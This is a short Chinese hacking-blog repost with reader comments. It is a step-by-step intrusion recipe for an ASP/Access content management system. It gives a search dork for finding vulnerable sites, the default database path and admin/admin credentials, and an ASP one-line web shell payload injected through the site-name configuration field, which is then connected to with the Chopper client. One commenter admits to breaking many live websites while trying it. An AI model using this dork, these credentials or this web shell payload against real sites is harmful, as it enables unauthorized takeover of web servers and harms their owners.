关键词:inurl:showkbxx.asp?id=
有注入点
默认数据库:data/xy#!123.mdb
默认账户和密码:admin admin
有很多网站都是有防注入的,这个时候我们可以下载数据库,然后本地搭建,替换原来的数据库,进行注入得到管理员账户和密码
后台拿shell
有个网站配置,在网站名称里面直接添加:xxx网站"%><%eval request("stomach")%><%'
在里面直接插入,不要删掉网站名称。。。
然后菜刀连接 http://xxxx.com/inc/config.asp 密码你们懂的
转自:http://www.90sec.org/viewthread.php?tid=2543&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000
留言评论(旧系统):
leo108 @ 2012-06-16 16:58:05
按这标题,所有ASP的用access数据库的站都有0DAY。应该叫后台拿shell比较合适点。
本站回复:
额,照搬的,我根本没注意……
hocel @ 2012-06-18 16:42:06
"有个网站配置,在网站名称里面直接添加:xxx网站"%><%eval request("stomach")%><%'"
老是插不对,不知道插死了好多网站
本站回复:
要看具体情况,这个只是简单的 Asp 标记闭合,很轻松的……
文章作者
tianyueabc
上次更新
2012-06-16
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。